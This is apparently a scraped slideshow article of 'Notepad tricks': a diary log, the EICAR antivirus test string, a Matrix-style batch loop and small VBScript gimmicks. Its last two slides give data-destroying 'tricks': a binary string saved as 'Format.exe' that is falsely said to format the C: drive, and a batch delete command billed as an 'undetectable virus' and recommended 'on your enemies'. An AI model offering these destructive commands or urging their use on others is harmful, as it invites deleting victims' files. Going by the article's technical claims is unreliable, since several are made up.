  • 4. Save the note as “personaldiary.txt”. When you open the file again you will see the current date and time being inserted automatically after the LOG line. This will happen automatically every time you reopen personaldiary.txt and you can keep a diary of sorts with it. 5. Test Your Anti-Virus Software’s Effectiveness You can also use Notepad to test whether your antivirus is as good as the av company claims it to be. Copy the code give below in your Notepad file: X5O!P%@AP[4PZX54(P^)7CC)7}$EIC AR-STANDARD-ANTIVIRUS-TEST- FILE!$H+H* Save this note as “virus.exe” on your computer and reopen it. If the antivirus installed on your PC/laptop is good enough it will trigger and flag virus.exe. If it doesn’t flag the virus.exe automatically put your PC on a scan and check out whether your antivirus is able to flag it. If not, its time to buy another anti-virus product.
  • 5. 6. Create Matrix Movie Computer Screen Effects in Your Computer Open Notepad and copy the below-mentioned text in your notepad file: @ECHO OFF COLOR 02 :START ECHO %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% %RANDOM% GOTO START Now save the note as”matrix .bat ” in your PC/laptop. Reopen it and enjoy the Matrix-like effects that appear on your screen. 7. Convert Text Into Audio With This Notepad Trick Open Notepad and type DIM MESSAGE, SAPI MESSAGE=INPUTBOX(“ENTER YOUR TEXT FOR CONVERSION–
  • 6. HACKING-TECHWORM”,”HOVER PC HACKS TEXT-TO-AUDIO CONVERTER”) SET SAPI=CREATEOBJECT(“SAPI.SPVOI CE”) SAPI.SPEAK MESSAGE Now save this note as “textaudio.vbs” on your computer. Open textaudio.vbs and hear your PC/laptop speak. 8. Disco Dancing Keyboard Light Trick Open Notepad and copy the following text as it is. SET WSHSHELL =WSCRIPT.CREATEOBJECT(“WSCRI PT.SHELL”) DO WSCRIPT.SLEEP 100 WSHSHELL.SENDKEYS “{CAPSLOCK}” WSHSHELL.SENDKEYS “{NUMLOCK}” WSHSHELL.SENDKEYS
  • 7. “{SCROLLLOCK}” LOOP Now save the note as “disco.vbs” on your PC/laptop. Now reopen disco.vbs and watch your keyboard turn into disco lights. Never run the below mentioned two tricks on your PC/laptop. Running these files will delete/format your C: Drive. 9. Format Your Whole Hard Disk With This Notepad Trick This is really interesting things for you guys, you can format any PC by executing below file. Open notepad and type the below code in it. 0110011001101111011100100110110 1011000010111010000 100000011000110011101001011100 0010000000101111010100010010111 101011000 Now save it as “Format.exe” or give any name you desire but keep the extension as .exe. That’s It ! Now just double click on the file (to open it) and your C: drive will be formatted ! 10. Write A Simple Undetectable Virus
  • 8. Like the above trick, this will also delete the contents of your C: Drive. Open Notepad and copy paste the below text. @ECHO OFF DEL C: *.* |Y And save that as bomb.bat or any other name that you with .bat extension. When you double-click and open this file, it will start deleting the contents of your C: The above two tricks are best to be tried on your enemies.